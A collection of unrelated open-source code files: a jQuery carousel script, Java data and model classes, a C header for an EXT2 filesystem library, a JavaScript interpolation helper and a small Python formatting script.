	// NOTE(review): imageWidth and popupTimeout are assigned/declared but unused.
	var image, imageWidth, imagePos, popupImage, imgPosLeft, imgPosTop, popupTimeout;
	$('#carousel').on('mouseenter', 'li', function(){
		image = $(this).find('img');
		imagePos = image.offset();
		imgPosLeft = imagePos.left;
		imgPosTop = imagePos.top - 90;
		imageWidth = image.width();
		popupImage = $('<img src="'+image.attr('src')+'" alt="" class="popup-image" style="opacity:0;top:'+imgPosTop+'px; left:'+imgPosLeft+'px" id="image_'+image.index()+'" />');
		$('.popup-image').remove();
		$('body').append(popupImage);
		// Center horizontally once the popup's width is known.
		imgPosLeft = imgPosLeft + 20 - popupImage.width()/2;
		popupImage.css({'left':imgPosLeft, 'opacity':'1'});
	});
	$('#carousel').on('mouseout', 'li', function(){
		$('.popup-image').remove();
	})

	// "Details" toggle button; label strings are user-facing (Russian).
	$('#details-btn').on('click', function(){
		if(!$(this).data('opened')){
			$('#exponats-details').show();
			$('#exponat-main-container').hide();
			$(this).data('opened', true);
			$(this).text('Спрятать детали');
		} else {
			$('#exponats-details').hide();
			$('#exponat-main-container').show();
			$(this).data('opened', false);
			$(this).text('Детали');
		}
		return false;
	})
})
Git-liuxiaoyu/cloud-hospital-parent
cloud-hospital-parent/cloud-hospital-nacos-parent/worker-service/src/main/java/com/example/workerservice/outlet/dao/mysql/po/OutRoomPo.java
package com.example.workerservice.outlet.dao.mysql.po; public class OutRoomPo { private Long id; private Integer departmentid; private String roomname; private String status; public Long getId() { return id; } public void setId(Long id) { this.id = id; } public Integer getDepartmentid() { return departmentid; } public void setDepartmentid(Integer departmentid) { this.departmentid = departmentid; } public String getRoomname() { return roomname; } public void setRoomname(String roomname) { this.roomname = roomname == null ? null : roomname.trim(); } public String getStatus() { return status; } public void setStatus(String status) { this.status = status == null ? null : status.trim(); } }
inorangestylee/lsvmtools
lsvmutils/ext2.h
<filename>lsvmutils/ext2.h<gh_stars>1-10
/*
**==============================================================================
**
** LSVMTools
**
** MIT License
**
** Copyright (c) Microsoft Corporation. All rights reserved.
**
** Permission is hereby granted, free of charge, to any person obtaining a copy
** of this software and associated documentation files (the "Software"), to deal
** in the Software without restriction, including without limitation the rights
** to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
** copies of the Software, and to permit persons to whom the Software is
** furnished to do so, subject to the following conditions:
**
** The above copyright notice and this permission notice shall be included in
** all copies or substantial portions of the Software.
**
** THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
** IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
** FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
** AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
** LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
** OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
** SOFTWARE
**
**==============================================================================
*/

/* Minimal EXT2 filesystem access layer on top of the Blkdev abstraction:
** superblock/group/inode structures, directory iteration, and file I/O.
** Usable both in EFI builds (BUILD_EFI) and hosted builds. */
#ifndef _ext2_h
#define _ext2_h

#include "config.h"

#if !defined(BUILD_EFI)
# include <stdio.h>
# include <stdlib.h>
#endif

#include "blkdev.h"
#include "strarr.h"
#include "sha.h"
#include "buf.h"

/*
**==============================================================================
**
** basic types:
**
**==============================================================================
*/

/* Inode number (EXT2_ROOT_INO == 2 is the filesystem root). */
typedef unsigned int EXT2Ino;
/* Offset type used by the directory iterator (EXT2DirEnt.d_off). */
typedef unsigned int EXT2Off;

/*
**==============================================================================
**
** errors:
**
**==============================================================================
*/

/* Flip to '#if 1' to wrap error codes in a struct for extra type safety.
** Disabled by default: errors are a plain enum. */
#if 0
# define EXT2_USE_TYPESAFE_ERRORS
#endif

/* EXT2_IFERR(err) is nonzero when err denotes a failure;
** EXT2_ERRNO(err) extracts the numeric code. Both work with either
** representation selected above. */
#define EXT2_IFERR(ERR) __EXT2IfErr(ERR)
#define EXT2_ERRNO(ERR) __EXT2Errno(ERR)

#if defined(EXT2_USE_TYPESAFE_ERRORS)

/* NOTE(review): the field name 'errno' can collide with the C library's
** errno macro if <errno.h> is ever included; this branch is disabled by
** default ('#if 0' above) -- confirm before enabling. */
typedef struct _EXT2Err
{
    int errno;
}
EXT2Err;

static __inline BOOLEAN __EXT2IfErr(EXT2Err err)
{
    return err.errno ? 1 : 0;
}

static __inline unsigned int __EXT2Errno(EXT2Err err)
{
    return err.errno;
}

extern const EXT2Err EXT2_ERR_NONE;
extern const EXT2Err EXT2_ERR_FAILED;
extern const EXT2Err EXT2_ERR_INVALID_PARAMETER;
extern const EXT2Err EXT2_ERR_FILE_NOT_FOUND;
extern const EXT2Err EXT2_ERR_BAD_MAGIC;
extern const EXT2Err EXT2_ERR_UNSUPPORTED;
extern const EXT2Err EXT2_ERR_OUT_OF_MEMORY;
extern const EXT2Err EXT2_ERR_FAILED_TO_READ_SUPERBLOCK;
extern const EXT2Err EXT2_ERR_FAILED_TO_READ_GROUPS;
extern const EXT2Err EXT2_ERR_FAILED_TO_READ_INODE;
extern const EXT2Err EXT2_ERR_UNSUPPORTED_REVISION;
extern const EXT2Err EXT2_ERR_OPEN_FAILED;
extern const EXT2Err EXT2_ERR_BUFFER_OVERFLOW;
extern const EXT2Err EXT2_ERR_SEEK_FAILED;
extern const EXT2Err EXT2_ERR_READ_FAILED;
extern const EXT2Err EXT2_ERR_WRITE_FAILED;
extern const EXT2Err EXT2_ERR_UNEXPECTED;
extern const EXT2Err EXT2_ERR_SANITY_CHECK_FAILED;
extern const EXT2Err EXT2_ERR_BAD_BLKNO;
extern const EXT2Err EXT2_ERR_BAD_INO;
extern const EXT2Err EXT2_ERR_BAD_GRPNO;
extern const EXT2Err EXT2_ERR_BAD_MULTIPLE;
extern const EXT2Err EXT2_ERR_EXTRANEOUS_DATA;
extern const EXT2Err EXT2_ERR_BAD_SIZE;
extern const EXT2Err EXT2_ERR_PATH_TOO_LONG;

#else /* defined(EXT2_USE_TYPESAFE_ERRORS) */

/* EXT2_ERR_NONE is zero by position, so a plain truth test works. */
typedef enum _EXT2Err
{
    EXT2_ERR_NONE,
    EXT2_ERR_FAILED,
    EXT2_ERR_INVALID_PARAMETER,
    EXT2_ERR_FILE_NOT_FOUND,
    EXT2_ERR_BAD_MAGIC,
    EXT2_ERR_UNSUPPORTED,
    EXT2_ERR_OUT_OF_MEMORY,
    EXT2_ERR_FAILED_TO_READ_SUPERBLOCK,
    EXT2_ERR_FAILED_TO_READ_GROUPS,
    EXT2_ERR_FAILED_TO_READ_INODE,
    EXT2_ERR_UNSUPPORTED_REVISION,
    EXT2_ERR_OPEN_FAILED,
    EXT2_ERR_BUFFER_OVERFLOW,
    EXT2_ERR_SEEK_FAILED,
    EXT2_ERR_READ_FAILED,
    EXT2_ERR_WRITE_FAILED,
    EXT2_ERR_UNEXPECTED,
    EXT2_ERR_SANITY_CHECK_FAILED,
    EXT2_ERR_BAD_BLKNO,
    EXT2_ERR_BAD_INO,
    EXT2_ERR_BAD_GRPNO,
    EXT2_ERR_BAD_MULTIPLE,
    EXT2_ERR_EXTRANEOUS_DATA,
    EXT2_ERR_BAD_SIZE,
    EXT2_ERR_PATH_TOO_LONG,
}
EXT2Err;

static __inline BOOLEAN __EXT2IfErr(EXT2Err err)
{
    return err ? 1 : 0;
}

static __inline unsigned int __EXT2Errno(EXT2Err err)
{
    return err;
}

#endif /* defined(EXT2_USE_TYPESAFE_ERRORS) */

/* Returns a human-readable string for the given error code. */
const char* EXT2ErrStr(
    EXT2Err err);

/*
**==============================================================================
**
** structure typedefs:
**
**==============================================================================
*/

typedef struct _EXT2 EXT2;
typedef struct _EXT2Block EXT2Block;
typedef struct _EXT2SuperBlock EXT2SuperBlock;
typedef struct _EXT2GroupDesc EXT2GroupDesc;
typedef struct _EXT2Inode EXT2Inode;
typedef struct _EXT2DirectoryEntry EXT2DirEntry;
typedef struct _EXT2_DIR EXT2_DIR;

/*
**==============================================================================
**
** blocks:
**
**==============================================================================
*/

/* Largest supported filesystem block size; EXT2Block buffers are always
** allocated at this size and 'size' records the actual block size. */
#define EXT2_MAX_BLOCK_SIZE (8 * 1024)

/* One filesystem block held in memory. */
struct _EXT2Block
{
    UINT8 data[EXT2_MAX_BLOCK_SIZE];
    UINT32 size;
};

/* Reads block 'blkno' from the device into 'block'. */
EXT2Err EXT2ReadBlock(
    const EXT2* ext2,
    UINT32 blkno,
    EXT2Block* block);

/* Writes 'block' to block number 'blkno' on the device. */
EXT2Err EXT2WriteBlock(
    const EXT2* ext2,
    UINT32 blkno,
    const EXT2Block* block);

/*
**==============================================================================
**
** super block:
**
**==============================================================================
*/

/* Offset of super block from start of file system */
#define EXT2_BASE_OFFSET 1024

/* Expected value of EXT2SuperBlock.s_magic. */
#define EXT2_S_MAGIC 0xEF53

#define EXT2_GOOD_OLD_REV 0 /* Revision 0 EXT2 */
#define EXT2_DYNAMIC_REV 1 /* Revision 1 EXT2 */

/* On-disk EXT2 superblock layout (field names follow the ext2 spec). */
struct _EXT2SuperBlock
{
    /* General */
    UINT32 s_inodes_count;
    UINT32 s_blocks_count;
    UINT32 s_r_blocks_count;
    UINT32 s_free_blocks_count;
    UINT32 s_free_inodes_count;
    UINT32 s_first_data_block;
    UINT32 s_log_block_size;
    UINT32 s_log_frag_size;
    UINT32 s_blocks_per_group;
    UINT32 s_frags_per_group;
    UINT32 s_inodes_per_group;
    UINT32 s_mtime;
    UINT32 s_wtime;
    UINT16 s_mnt_count;
    UINT16 s_max_mnt_count;
    UINT16 s_magic;
    UINT16 s_state;
    UINT16 s_errors;
    UINT16 s_minor_rev_level;
    UINT32 s_lastcheck;
    UINT32 s_checkinterval;
    UINT32 s_creator_os;
    UINT32 s_rev_level;
    UINT16 s_def_resuid;
    UINT16 s_def_resgid;

    /* DYNAMIC_REV Specific */
    UINT32 s_first_ino;
    UINT16 s_inode_size;
    UINT16 s_block_group_nr;
    UINT32 s_feature_compat;
    UINT32 s_feature_incompat;
    UINT32 s_feature_ro_compat;
    UINT8 s_uuid[16];
    UINT8 s_volume_name[16];
    UINT8 s_last_mounted[64];
    UINT32 s_algo_bitmap;

    /* Performance Hints */
    UINT8 s_prealloc_blocks;
    UINT8 s_prealloc_dir_blocks;
    UINT16 __alignment;

    /* Journaling Support */
    UINT8 s_journal_uuid[16];
    UINT32 s_journal_inum;
    UINT32 s_journal_dev;
    UINT32 s_last_orphan;

    /* Directory Indexing Support */
    UINT32 s_hash_seed[4];
    UINT8 s_def_hash_version;
    UINT8 padding[3];

    /* Other options */
    UINT32 s_default_mount_options;
    UINT32 s_first_meta_bg;
    UINT8 __unused[760];
};

/* Prints the superblock fields (diagnostics). */
void EXT2DumpSuperBlock(
    const EXT2SuperBlock* sb);

/*
**==============================================================================
**
** groups:
**
**==============================================================================
*/

/* On-disk block-group descriptor. */
struct _EXT2GroupDesc
{
    UINT32 bg_block_bitmap;
    UINT32 bg_inode_bitmap;
    UINT32 bg_inode_table;
    UINT16 bg_free_blocks_count;
    UINT16 bg_free_inodes_count;
    UINT16 bg_used_dirs_count;
    UINT16 bg_pad;
    UINT8 bg_reserved[12];
};

/*
**==============================================================================
**
** inodes:
**
**==============================================================================
*/

/* Reserved inode numbers. */
#define EXT2_BAD_INO 1
#define EXT2_ROOT_INO 2
#define EXT2_ACL_IDX_INO 3
#define EXT2_ACL_DATA_INO 4
#define EXT2_BOOT_LOADER_INO 5
#define EXT2_UNDEL_DIR_INO 6
#define EXT2_FIRST_INO 11

/* Indices of the indirect block pointers within i_block[]. */
#define EXT2_SINGLE_INDIRECT_BLOCK 12
#define EXT2_DOUBLE_INDIRECT_BLOCK 13
#define EXT2_TRIPLE_INDIRECT_BLOCK 14

/* i_mode: file-type bits. */
#define EXT2_S_IFSOCK 0xC000
#define EXT2_S_IFLNK 0xA000
#define EXT2_S_IFREG 0x8000
#define EXT2_S_IFBLK 0x6000
#define EXT2_S_IFDIR 0x4000
#define EXT2_S_IFCHR 0x2000
#define EXT2_S_IFIFO 0x1000
/* i_mode: permission and setuid/setgid/sticky bits. */
#define EXT2_S_ISUID 0x0800
#define EXT2_S_ISGID 0x0400
#define EXT2_S_ISVTX 0x0200
#define EXT2_S_IRUSR 0x0100
#define EXT2_S_IWUSR 0x0080
#define EXT2_S_IXUSR 0x0040
#define EXT2_S_IRGRP 0x0020
#define EXT2_S_IWGRP 0x0010
#define EXT2_S_IXGRP 0x0008
#define EXT2_S_IROTH 0x0004
#define EXT2_S_IWOTH 0x0002
#define EXT2_S_IXOTH 0x0001

/* i_flags values. NOTE(review): EXT2_BTREE_FL and EXT2_INDEX_FL share the
** value 0x00001000 (the flag was renamed upstream); both names kept. */
#define EXT2_SECRM_FL 0x00000001
#define EXT2_UNRM_FL 0x00000002
#define EXT2_COMPR_FL 0x00000004
#define EXT2_SYNC_FL 0x00000008
#define EXT2_IMMUTABLE_FL 0x00000010
#define EXT2_APPEND_FL 0x00000020
#define EXT2_NODUMP_FL 0x00000040
#define EXT2_NOATIME_FL 0x00000080
#define EXT2_DIRTY_FL 0x00000100
#define EXT2_COMPRBLK_FL 0x00000200
#define EXT2_NOCOMPR_FL 0x00000400
#define EXT2_ECOMPR_FL 0x00000800
#define EXT2_BTREE_FL 0x00001000
#define EXT2_INDEX_FL 0x00001000
#define EXT2_IMAGIC_FL 0x00002000
#define EXT3_JOURNAL_DATA_FL 0x00004000
#define EXT2_RESERVED_FL 0x80000000

/* On-disk inode layout. */
struct _EXT2Inode
{
    UINT16 i_mode;
    UINT16 i_uid;
    UINT32 i_size;
    UINT32 i_atime;
    UINT32 i_ctime;
    UINT32 i_mtime;
    UINT32 i_dtime;
    UINT16 i_gid;
    UINT16 i_links_count;
    UINT32 i_blocks;
    UINT32 i_flags;
    UINT32 i_osd1;
    /*
        0:11 -- direct block numbers
        12 -- indirect block number
        13 -- double-indirect block number
        14 -- triple-indirect block number
    */
    UINT32 i_block[15];
    UINT32 i_generation;
    UINT32 i_file_acl;
    UINT32 i_dir_acl;
    UINT32 i_faddr;
    UINT8 i_osd2[12];
    UINT8 dummy[128]; /* sometimes the inode is bigger */
};

/* Prints the inode fields (diagnostics). */
void EXT2DumpInode(
    const EXT2* ext2,
    const EXT2Inode* inode);

/* Reads the inode with number 'ino' into 'inode'. */
EXT2Err EXT2ReadInode(
    const EXT2* ext2,
    EXT2Ino ino,
    EXT2Inode* inode);

/* Resolves an absolute path to its inode number. */
EXT2Err EXT2PathToIno(
    const EXT2* ext2,
    const char* path,
    UINT32* ino);

/* Resolves an absolute path to both its inode number and inode contents. */
EXT2Err EXT2PathToInode(
    const EXT2* ext2,
    const char* path,
    EXT2Ino* ino,
    EXT2Inode* inode);

/*
**==============================================================================
**
** bitmaps:
**
**==============================================================================
*/

/* Reads the block-allocation bitmap of the given block group. */
EXT2Err EXT2ReadBlockBitmap(
    const EXT2* ext2,
    UINT32 group_index,
    EXT2Block* block);

/* Writes the block-allocation bitmap of the given block group. */
EXT2Err EXT2WriteBlockBitmap(
    const EXT2* ext2,
    UINT32 group_index,
    const EXT2Block* block);

/* Reads the inode-allocation bitmap of the given block group.
** NOTE(review): name looks like a typo ("readRead"); kept as-is because
** callers elsewhere depend on it. */
EXT2Err EXT2readReadInodeBitmap(
    const EXT2* ext2,
    UINT32 group_index,
    EXT2Block* block);

/*
**==============================================================================
**
** directories:
**
**==============================================================================
*/

/* Maximum path/name length handled by this layer. */
#define EXT2_PATH_MAX 256

/* EXT2DirEntry.file_type values. */
#define EXT2_FT_UNKNOWN 0
#define EXT2_FT_REG_FILE 1
#define EXT2_FT_DIR 2
#define EXT2_FT_CHRDEV 3
#define EXT2_FT_BLKDEV 4
#define EXT2_FT_FIFO 5
#define EXT2_FT_SOCK 6
#define EXT2_FT_SYMLINK 7

/* On-disk directory entry (name buffer sized to the local maximum). */
struct _EXT2DirectoryEntry
{
    UINT32 inode;
    UINT16 rec_len;
    UINT8 name_len;
    UINT8 file_type;
    char name[EXT2_PATH_MAX];
};

/* Hash algorithms for indexed directories (s_def_hash_version). */
#define EXT2_DX_HASH_LEGACY 0
#define EXT2_DX_HASH_HALF_MD4 1
#define EXT2_DX_HASH_TEA 2

/* EXT2DirEnt.d_type values (readdir-style type codes). */
#define EXT2_DT_UNKNOWN 0
#define EXT2_DT_FIFO 1
#define EXT2_DT_CHR 2
#define EXT2_DT_DIR 4
#define EXT2_DT_BLK 6
#define EXT2_DT_REG 8
#define EXT2_DT_LNK 10
#define EXT2_DT_SOCK 12
#define EXT2_DT_WHT 14

/* Directory entry as returned by the iterator (dirent-like). */
typedef struct _EXT2DirEnt
{
    EXT2Ino d_ino;
    EXT2Off d_off;
    UINT16 d_reclen;
    UINT8 d_type;
    char d_name[EXT2_PATH_MAX];
}
EXT2DirEnt;

/* Opens a directory by path; returns NULL on failure. */
EXT2_DIR *EXT2OpenDir(
    const EXT2* ext2,
    const char *name);

/* Opens a directory by inode number; returns NULL on failure. */
EXT2_DIR *EXT2OpenDirIno(
    const EXT2* ext2,
    EXT2Ino ino);

/* Returns the next entry, or NULL at end of directory. */
EXT2DirEnt *EXT2ReadDir(
    EXT2_DIR *dir);

/* Releases a directory handle. */
EXT2Err EXT2CloseDir(
    EXT2_DIR* dir);

/* Returns all entries of the directory inode in a caller-freed array. */
EXT2Err EXT2ListDirInode(
    const EXT2* ext2,
    UINT32 global_ino,
    EXT2DirEnt** entries,
    UINT32* num_entries);

/*
**==============================================================================
**
** files:
**
**==============================================================================
*/

/* Loads a whole file into a newly allocated buffer, given its inode. */
EXT2Err EXT2LoadFileFromInode(
    const EXT2* ext2,
    const EXT2Inode* inode,
    void** data,
    UINT32* size);

/* Loads a whole file into a newly allocated buffer, given its path. */
EXT2Err EXT2LoadFileFromPath(
    const EXT2* ext2,
    const char* path,
    void** data,
    UINT32* size);

/* Loads a whole file into a newly allocated buffer -- no EXT2* parameter;
** presumably resolves the filesystem internally -- confirm in ext2.c. */
EXT2Err EXT2LoadFile(
    const char* path,
    void** data,
    UINT32* size);

/*
**==============================================================================
**
** EXT2:
**
**==============================================================================
*/

/* In-memory filesystem handle: device, cached superblock, derived geometry,
** group descriptors and the root inode. */
struct _EXT2
{
    Blkdev* dev;
    EXT2SuperBlock sb;
    UINT32 block_size; /* block size in bytes */
    UINT32 group_count;
    EXT2GroupDesc* groups;
    EXT2Inode root_inode;
};

/* True when the handle is non-null and its superblock magic is valid. */
static __inline BOOLEAN EXT2Valid(
    const EXT2* ext2)
{
    return ext2 != NULL && ext2->sb.s_magic == EXT2_S_MAGIC;
}

/* Creates a filesystem handle over the given block device. */
EXT2Err EXT2New(
    Blkdev* dev,
    EXT2** ext2);

/* Destroys a handle created by EXT2New. */
void EXT2Delete(
    EXT2* ext2);

/* Dumps filesystem metadata (diagnostics). */
EXT2Err EXT2Dump(
    const EXT2* ext2);

/* Runs consistency checks on the filesystem. */
EXT2Err EXT2Check(
    const EXT2* ext2);

/* Truncates the file at 'path'. */
EXT2Err EXT2Trunc(
    EXT2* ext2,
    const char* path);

/* Replaces the contents of an existing file at 'path'. */
EXT2Err EXT2Update(
    EXT2* ext2,
    const void* data,
    UINT32 size,
    const char* path);

/* Removes the file at 'path'. */
EXT2Err EXT2Rm(
    EXT2* ext2,
    const char* path);

/* rw-r--r-- */
#define EXT2_FILE_MODE_RW0_R00_R00 \
    (EXT2_S_IFREG|EXT2_S_IRUSR|EXT2_S_IWUSR|EXT2_S_IRGRP|EXT2_S_IROTH)

/* rw------- */
#define EXT2_FILE_MODE_RW0_000_000 (EXT2_S_IFREG|EXT2_S_IRUSR|EXT2_S_IWUSR)

/* Creates (or replaces) a file at 'path' with the given contents and mode. */
EXT2Err EXT2Put(
    EXT2* ext2,
    const void* data,
    UINT32 size,
    const char* path,
    UINT16 mode); /* See EXT2_S_* flags above */

/* rwxr-xr-x */
#define EXT2_DIR_MODE_RWX_R0X_R0X \
    (EXT2_S_IFDIR | \
    (EXT2_S_IRUSR|EXT2_S_IWUSR|EXT2_S_IXUSR) | \
    (EXT2_S_IRGRP|EXT2_S_IXGRP) | \
    (EXT2_S_IROTH|EXT2_S_IXOTH))

/* Creates a directory at 'path' with the given mode. */
EXT2Err EXT2MkDir(
    EXT2* ext2,
    const char* path,
    UINT16 mode); /* See EXT2_S_* flags above */

/* Lists paths under 'root' recursively into 'paths'. */
EXT2Err EXT2Lsr(
    EXT2* ext2,
    const char* root,
    StrArr* paths);

/* Computes SHA-1/SHA-256 digests over the directory tree rooted at 'root'. */
EXT2Err EXT2HashDir(
    EXT2* ext2,
    const char* root,
    SHA1Hash* sha1,
    SHA256Hash* sha256);

/*
**==============================================================================
**
** EXT2File:
**
**==============================================================================
*/

/* Opaque stream-style file handle. */
typedef struct _EXT2File EXT2File;

typedef enum _EXT2FileMode
{
    EXT2FILE_RDWR,
    EXT2FILE_RDONLY,
    EXT2FILE_WRONLY
}
EXT2FileMode;

/* Opens a file for stream-style access; returns NULL on failure. */
EXT2File* EXT2OpenFile(
    EXT2* ext2,
    const char* path,
    EXT2FileMode mode);

/* Reads up to 'size' bytes; returns the count read or a negative value. */
INTN EXT2ReadFile(
    EXT2File* file,
    void* data,
    UINTN size);

/* Writes 'size' bytes; returns the count written or a negative value. */
INTN EXT2WriteFile(
    EXT2File* file,
    const void* data,
    UINTN size);

/* Repositions the file offset; returns 0 on success. */
int EXT2SeekFile(
    EXT2File* file,
    INTN offset);

/* Returns the current file offset. */
INTN EXT2TellFile(
    EXT2File* file);

/* Returns the file size. */
INTN EXT2SizeFile(
    EXT2File* file);

/* Flushes pending writes; returns 0 on success. */
int EXT2FlushFile(
    EXT2File* file);

/* Closes the handle; returns 0 on success. */
int EXT2CloseFile(
    EXT2File* file);

/* Reverse lookup: finds which file (if any) owns block 'blkno'. */
EXT2Err EXT2WhoseBlock(
    EXT2* ext2,
    UINT32 blkno,
    BOOLEAN* found,
    char path[EXT2_PATH_MAX]);

/* Collects the block numbers that make up the file at 'path'. */
EXT2Err EXT2GetBlockNumbers(
    EXT2* ext2,
    const char* path,
    BufU32* blknos);

/* Converts a filesystem block number to a device LBA. */
UINTN EXT2BlknoToLBA(
    const EXT2* ext2,
    UINT32 blkno);

/* Get the block number (LBA) of the first block of this file */
EXT2Err EXT2GetFirstBlkno(
    const EXT2* ext2,
    EXT2Ino ino,
    UINT32* blkno);

#endif /* _ext2_h */
yeonjuan/editor
src/editor/util/interpolate-functions/makeInterpolateLength.js
import { Length } from "../../unit/Length"; import { makeInterpolateNumber } from "./makeInterpolateNumber"; import { makeInterpolateIdentity } from "./makeInterpolateIdentity"; function getRealAttributeValue (layer, property, value, refType = 'width', refElement = 'parent') { var refObject = null if (refElement === 'parent') { refObject = layer[refElement][refType]; } else if (refElement === 'self') { refObject = layer[refType]; } if (refObject) { return value.toPx(refObject.value) } return value; } function rollbackRealAttributeValue (layer, property, value, unit, refType = 'width', refElement = 'parent') { var refObject = null if (refElement === 'parent') { refObject = layer[refElement][refType]; } else if (refElement === 'self') { refObject = layer[refType]; } if (refObject) { return value.to(unit, refObject.value) } return value; } export function makeInterpolateLength(layer, property, startNumber, endNumber, refType = 'width', refElement = 'parent') { var s = Length.parse(startNumber); var e = Length.parse(endNumber); if (s.unit === e.unit) { return makeInterpolateNumber(layer, property, s.value, e.value, s.unit); } else if (s.equals(e)) { return makeInterpolateIdentity(layer, property, s); } return (rate, t) => { var realStartValue = getRealAttributeValue(layer, property, s, refType, refElement); var realEndValue = getRealAttributeValue(layer, property, e, refType, refElement); if (t === 0) { return realStartValue; } else if (t === 1) { return realEndValue; } return rollbackRealAttributeValue( layer, property, Length.px(realStartValue.value + (realEndValue.value - realStartValue.value) * rate), s.unit, refType, refElement ); } }
kosovojs/pywikibot-scripts
prepare.py
file_nakosais = eval(open(r"lv-dumpscan-nakos.txt", "r", encoding='utf-8').read()) thetext = ["* [[{}]]: {}".format(f[0],f[1]) for f in file_nakosais] with open('dfdsfdsfsdfd.log', 'w', encoding='utf-8') as file_W: file_W.write('\n'.join(thetext))
olamy/taglibs-rdc
taglibs-rdc/src/main/java/org/apache/taglibs/rdc/core/BaseModel.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.taglibs.rdc.core; import java.io.Serializable; import java.text.MessageFormat; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.ResourceBundle; import java.util.StringTokenizer; import org.apache.taglibs.rdc.RDCUtils; import org.w3c.dom.Document; /** * <p>This is the base class for all RDCs. Each atomic RDC * must extend this class. GroupModel and ComponentModel * extend this class.</p> * * @author <NAME> * @author <NAME> */ public abstract class BaseModel implements Serializable { // CONSTANTS /** The default value of the minimum confidence. Results below this * confidence will result in the associated value being treated * as invalid and the RDC will reprompt for user input. 
*/ public static final float DEFAULT_MIN_CONFIDENCE = 0.4F; /** The unique identifier associated with this RDC */ public static final int DEFAULT_NUM_N_BEST = 1; /** The name that will be associated with the default grammar * used to refer to the initial value associated with this RDC * @see org.apache.taglibs.rdc.core.Grammar */ public static final String DEFAULT_INITIAL_GRAMMAR_NAME = "RDC_DEFAULT_INITIAL_GRAMMAR"; /** * The property under which the initial grammar is stored in the * resource bundles in org.apache.taglibs.rdc.resources */ public static final String PROPERTY_INITIAL_GRAMMAR = "rdc.core.basemodel.initialgrammar"; //Common validation errors /**A constant for errorCode when there is no error */ public static final int ERR_NONE = 635462; /**A constant for errorCode stating no default value is specified */ public static final int ERR_NO_DEFAULT = 635463; //Getters for common validation errors public final int getERR_NONE(){ return ERR_NONE; } public final int getERR_NO_DEFAULT(){ return ERR_NO_DEFAULT; } // PROPERTIES /** The unique identifier associated with this RDC */ protected String id; /** The current state of this RDC */ protected int state; /** This is used to identify the error that occured */ protected int errorCode; /** specifies whether to do confirmation or not */ protected Boolean confirm; /** Response of the user to the confirmation dialog */ protected Boolean confirmed; /** Indicates whether the current value for this RDC is valid * with respect to the supplied constraints */ protected Boolean isValid; /** The utterance of the user; what the user said */ protected String utterance; /** The normalized value for the input of this RDC */ protected String canonicalizedValue; /** The semantic interpretation returned for the input of this RDC */ protected Map interpretation; /** The URI to submit the vxml form */ protected String submit; /** Path to component grammar(s) */ protected List grammars; /** The user preference for playing back the 
return value associated * with the RDC */ protected Boolean echo; /** Indicates whether this RDC is invoked as a subdialog. This will * affect what happens to the value collected by the RDC */ protected Boolean subdialog; /** Indicates whether the current value for this RDC is ambiguous */ protected Boolean isAmbiguous; /** Contains the list of ambiguous values keyed on grammar conforming values * For e.g., a map of ambiguous values for say, time 5'o clock would be * Key Value * 0500a 5 A M * 0500p 5 P M */ protected Map ambiguousValues; /** The default (parsed) configuration */ protected Document configuration; /** The class of the bean that subclasses this instance */ protected String className; /** Specifies whether this RDC should emit a submit URI - * may be removed in later versions of this tag library */ protected Boolean skipSubmit; /** Value currently associated with this RDC */ protected Object value; /** The default/initial value associated with this RDC */ protected Object initial; /** The serialized n-best data from the vxml browser */ protected String candidates; /** Minimum confidence below which all values are treated as invalid */ protected float minConfidence; /** The maximum number of n-best results requested from the vxml browser */ protected int numNBest; /** Map this model's properties to the params in the request it * should look for */ protected Map paramsMap; /** The grammar available for the user to pick default/initial value * associated with this RDC */ protected Grammar initialGrammar; /** The status at exit, indicating whether this RDC collected input * or gracefully exited after a number of retries */ protected int exitStatus; /** Maximum number of client side &lt;noinput&gt; events before this RDC * gracefully exits with Constants.EXIT_MAXNOINPUT exitStatus * @see Constants#EXIT_MAXNOINPUT */ protected int maxNoInput; /** Maximum number of client side &lt;nomatch&gt; events before this RDC * gracefully exits with 
Constants.EXIT_MAXNOMATCH exitStatus * @see Constants#EXIT_MAXNOMATCH */ protected int maxNoMatch; /** The Locale for this RDC */ protected String locale; /** The Locale for this RDC, defaults to Constants.rdcLocale * @see Constants#rdcLocale */ protected transient Locale rdcLocale; /** The ResourceBundle for this RDC,defaults to Constants.rdcResourceBundle * @see Constants#rdcResourceBundle */ protected transient ResourceBundle rdcResourceBundle; public BaseModel() { this.id = null; this.errorCode = ERR_NONE; this.confirm = Boolean.FALSE; this.confirmed = Boolean.FALSE; this.isValid = Boolean.FALSE; this.subdialog = Boolean.FALSE; this.utterance = null; this.canonicalizedValue = null; this.submit = null; this.grammars = new ArrayList(); this.echo = Boolean.FALSE; this.isAmbiguous = Boolean.FALSE; this.ambiguousValues = null; this.configuration = null; this.className = this.getClass().getName(); this.skipSubmit = Boolean.FALSE; this.value = null; this.initial = null; this.candidates = null; this.minConfidence = DEFAULT_MIN_CONFIDENCE; this.numNBest = DEFAULT_NUM_N_BEST; this.paramsMap = new HashMap(); this.initialGrammar = null; this.exitStatus = Constants.EXIT_UNREACHED; this.maxNoInput = 0; this.maxNoMatch = 0; this.locale = Constants.locale; this.rdcLocale = Constants.rdcLocale; this.rdcResourceBundle = Constants.rdcResourceBundle; } // BaseModel constructor /** * Get the id value for this RDC * * @return the id value */ public String getId() { return id; } /** * Set the id value for this RDC * * @param id The new id value. 
